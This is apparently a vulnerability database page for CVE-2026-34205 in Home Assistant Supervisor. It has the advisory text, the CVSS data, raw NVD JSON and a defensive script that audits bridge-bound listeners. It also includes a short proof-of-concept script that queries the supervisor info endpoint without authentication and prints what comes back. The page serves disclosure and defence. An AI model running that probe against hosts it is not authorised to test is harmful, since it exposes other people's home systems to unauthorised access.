Security Vulnerability Report
CVE-2026-34205 CVSS 9.6 CRITICAL

CVE-2026-34205

Published: 2026-03-27 20:16:35
Last Modified: 2026-03-30 13:26:30

Description

Home Assistant is open source home automation software that puts local control and privacy first. Home Assistant apps (formerly add-ons) configured with host network mode expose unauthenticated endpoints bound to the internal Docker bridge interface to the local network. On Linux, this configuration does not restrict access to the app as intended, allowing any device on the same network to reach these endpoints without authentication. Home Assistant Supervisor 2026.03.02 addresses the issue.
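To turn the description above into a host-side check, here is an added audit script (it is not part of the advisory or of the Home Assistant project). It parses `ss -Hlntp` output and flags TCP listeners bound to an internal bridge address rather than to loopback, which is the exposure pattern the advisory describes for host-network apps on Linux. The bridge subnets, the sample socket lines, and the process names are constructed assumptions for this example, not values taken from the advisory.

```python
"""Audit helper: find TCP listeners bound to an internal Docker bridge address.

Added example, not code from the advisory or the Home Assistant project.
Parses the column layout of `ss -Hlntp` and reports listeners whose local
address lies on an internal bridge subnet (the exposure the advisory describes).
"""
import ipaddress
import re
import subprocess
from typing import List, NamedTuple

# Bridge subnets to audit. Both values are assumptions for this example
# (Docker's default bridge and a range commonly used for the Supervisor's
# internal network); replace them with what `ip addr` shows on the host.
BRIDGE_SUBNETS = (
    ipaddress.ip_network("172.30.32.0/23"),
    ipaddress.ip_network("172.17.0.0/16"),
)

# Constructed sample in the column layout of `ss -Hlntp`:
# State Recv-Q Send-Q Local-Address:Port Peer-Address:Port Process
SAMPLE_SS_OUTPUT = """\
LISTEN 0 4096 127.0.0.1:8123 0.0.0.0:* users:(("python3",pid=4242,fd=7))
LISTEN 0 128 172.30.32.1:4357 0.0.0.0:* users:(("watchdog",pid=1337,fd=3))
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=900,fd=3))
LISTEN 0 511 [::1]:1883 [::]:* users:(("mosquitto",pid=2100,fd=5))
LISTEN 0 128 172.17.0.1:9000 0.0.0.0:* users:(("portainer",pid=3000,fd=9))
"""


class Listener(NamedTuple):
    address: str
    port: int
    process: str


_PROCESS_RE = re.compile(r'\(\("([^"]+)"')


def _split_local(field: str):
    """Split "addr:port", handling bracketed IPv6 such as "[::1]:1883"."""
    host, _, port = field.rpartition(":")
    return host.strip("[]"), int(port)


def parse_ss_lines(ss_output: str) -> List[Listener]:
    """Parse LISTEN rows of `ss -Hlntp` output into Listener tuples."""
    listeners = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        host, port = _split_local(fields[3])
        match = _PROCESS_RE.search(line)
        listeners.append(Listener(host, port, match.group(1) if match else "?"))
    return listeners


def classify_address(address: str) -> str:
    """Classify a bind address: loopback, all-interfaces, bridge, or other."""
    ip = ipaddress.ip_address(address)
    if ip.is_loopback:
        return "loopback"
    if ip.is_unspecified:
        return "all-interfaces"
    if any(ip in net for net in BRIDGE_SUBNETS):
        return "bridge"
    return "other"


def find_bridge_bound_listeners(ss_output: str) -> List[Listener]:
    """Return only the listeners bound to an assumed internal bridge address."""
    return [l for l in parse_ss_lines(ss_output) if classify_address(l.address) == "bridge"]


def audit_report(ss_output: str) -> List[str]:
    """One human-readable line per listener, with a verdict for each."""
    verdicts = {
        "loopback": "local-only",
        "all-interfaces": "exposed on every interface by design",
        "bridge": "BRIDGE-BOUND: may be reachable from the LAN (see advisory)",
        "other": "review",
    }
    return [
        f"{l.process:<12} {l.address}:{l.port:<6} {verdicts[classify_address(l.address)]}"
        for l in parse_ss_lines(ss_output)
    ]


if __name__ == "__main__":
    # Use live `ss` output when available; fall back to the constructed sample.
    try:
        live = subprocess.run(["ss", "-Hlntp"], capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        live = SAMPLE_SS_OUTPUT
    for row in audit_report(live):
        print(row)
```

Run it on the Home Assistant host after applying the Supervisor 2026.03.02 update named in the description to confirm nothing is still listening on a bridge address. Any listener it flags should be moved to loopback, placed behind authentication, or made unreachable from the LAN interface by a host firewall rule that drops LAN-ingress packets addressed to the bridge IP; the update itself remains the primary remediation.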

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Home Assistant Supervisor < 2026.03.02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-34205
# Target: Home Assistant Supervisor < 2026.03.02
# Description: Check if unauthenticated endpoints are exposed on LAN

target_host = "192.168.1.XXX"  # Replace with target IP
exposed_port = "4357"  # Default Supervisor API port might be exposed, or Add-on ports

# Attempt to access a sensitive endpoint without auth
url = f"http://{target_host}:{exposed_port}/api/supervisor/info"

try:
    response = requests.get(url, timeout=5)
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed: Unauthenticated access allowed.")
        print(f"[+] Response Body: {response.text}")
    else:
        print(f"[-] Status Code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error connecting to target: {e}")
```

References

https://github.com/home-assistant/core/security/advisories/GHSA-gh5m-4m97-c95h (GitHub Security Advisory)

Weakness: CWE-923
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34205",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-27T20:16:35.360",
    "lastModified": "2026-03-30T13:26:29.793",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Home Assistant is open source home automation software that puts local control and privacy first. Home Assistant apps (formerly add-ons) configured with host network mode expose unauthenticated endpoints bound to the internal Docker bridge interface to the local network. On Linux, this configuration does not restrict access to the app as intended, allowing any device on the same network to reach these endpoints without authentication. Home Assistant Supervisor 2026.03.02 addresses the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-923"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/home-assistant/core/security/advisories/GHSA-gh5m-4m97-c95h",
        "source": "[email protected]"
      }
    ]
  }
}
```